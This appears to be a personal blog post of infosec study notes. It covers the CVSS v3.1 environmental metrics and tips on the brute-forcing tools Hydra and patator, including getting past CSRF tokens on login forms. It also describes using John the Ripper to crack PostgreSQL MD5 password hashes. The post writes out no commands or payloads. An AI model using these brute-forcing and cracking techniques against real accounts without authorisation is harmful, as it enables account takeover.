Information Security Keywords

Published: August 22, 2024

Here are some keywords I’ve come across when studying various information security topics.

CVSS

I refer to CVSS v3.1 here.

Environmental metric group

This considers the impact of a user’s environment on the vulnerability. Consider an application that is used by an organization with specific needs in terms of CIA (confidentiality, integrity, availability).

By default, it is assumed that the impact on CIA is medium, and this can be adjusted to either decrease or increase the score, by giving any single one in CIA a low or high score.

Brute-forcing tools

thc-hydra

It worked well for fuzzing basic SMB and HTTP. For better SMB support, it needs to be configured and compiled to use samba on Linux, and used with the smb2 module.

Unfortunately, it does not work well with HTTP forms that require submitting a hidden field such as a CSRF token, and can only send cookies next to the actual POST form submit.

Links:

patator

This works well for brute-forcing HTML forms that require CSRF tokens to be submitted as well. There is a flag to instruct it to fetch a separate page and grep for a field inside, for example a field like the following:

<input type="hidden" name="csrf-token" value="foobar" />

The value foobar is then extracted and can be referred in the HTTP POST body generation.

Links:

John the Ripper

A feature that surprised me a lot in John is the ability to create custom formats using dynamic formats. If a specific password hash uses a very obscure “hash, then salt, then hash, then add constant”-type method, it can be defined quite easily using a domain specific language (DSL).

I have had tremendous success using this in combination with the d3ad0ne rule to crack leetspeak-like passwords when extracting slightly obscure PostgreSQL MD5 password hashes. from PostgreSQL. MD5 is very dangerous indeed.

Links:

Tags

I would be thrilled to hear from you! Please share your thoughts and ideas with me via email.

Back to Index